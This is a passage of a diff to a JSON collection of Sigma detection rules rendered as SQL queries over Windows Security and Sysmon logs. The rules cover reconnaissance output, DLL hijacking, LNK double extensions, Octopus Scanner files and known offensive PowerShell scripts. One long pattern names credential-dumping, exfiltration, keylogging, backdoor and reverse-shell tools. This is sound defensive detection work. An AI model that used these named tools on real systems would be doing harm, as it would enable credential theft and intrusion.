set. 
Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE 
'%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' 
ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", + "status": "experimental", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Users creating a shortcut on e.g. desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 